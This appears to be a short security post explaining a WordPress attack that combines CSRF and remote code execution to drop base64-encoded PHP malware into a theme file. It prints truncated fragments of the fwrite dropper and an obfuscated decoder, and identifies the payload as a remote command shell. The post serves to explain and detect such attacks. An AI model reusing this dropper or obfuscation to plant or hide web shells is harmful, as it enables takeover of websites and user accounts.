An attacker trying hide malware, before it’s uploaded, fwrite to server and executed. This attacks type uses Cross-Site Request Forgery & Remote Content Execution vulnerability together (CSRF & RCE vulnerability)
It’s also base64 encoded content, so it’s more difficult find with scanners.
Example – fwrite & base64_encoded malware
<?php $dst = ABSPATH . 'wp-content/themes/platform/__oya.php'; echo $dst; $fp = fopen($dst, 'wb'); if ($fp) { fwrite($fp, base64_decode('PD9waHAKJEY5I...
base64_decode malware
When malware uploaded to server and executed, it’s write content to php file in server
$F9 = 'zhbirukpongfatwejldqs4_cymxv;6';
$Vf6 = $F9{20} . $F9{13} . $F9{4} . $F9{22} . $F9{4} . $F9{15} . $F9{7} . $F9{17} . $F9{12} . $F9{23} . $F9{15};
$ygE = $F9{2} . $F9{12} . $F9{20} . $F9{15} . $F9{29} . $F9{21} . $F9{22} . $F9{18} . $F9{15} . $F9{23} . $F9{8} . $F9{18} . $F9{15};
$VHN = $F9{23} . $F9{4} . $F9{15} . $F9{12} . $F9{13} . $F9{15} . $F9{22} . $F9{11} . $F9{5} . $F9{9} . $F9{23} . $F9{13} . $F9{3} . $F9{8} . $F9{9};
$Er = $VHN( '$zLx,$L7j', $ygE($Vf6( array($F9{28}, "\n"), "", "JHIgPSAnJ;ztmb3IoJGk;9MDska;TxzdHJsZ;W4oJH;pMeCk7;JGkrK;yl7JGM;9b3JkK;HN1YnN0;cigk;ekx4LC;
AkaS;kpOyRj;LT1vcmQo;c3Vic3RyK;CRMN2o;sKCgkaS;sxKSVzdH;JsZW4o;JEw3;aikp;KSk7JHIu;PWNocihh
Yn;MoJGMp;ICYg;MHhGR;ik7fXJldHV;ybiAk;cjs=" )) );
$BDp = $VHN( "", $Er($ygE($Vf6( array($F9{28}, "\n")
.
.
.
Typically this is always some kind remote command shell, so attackers get a full control user website and account.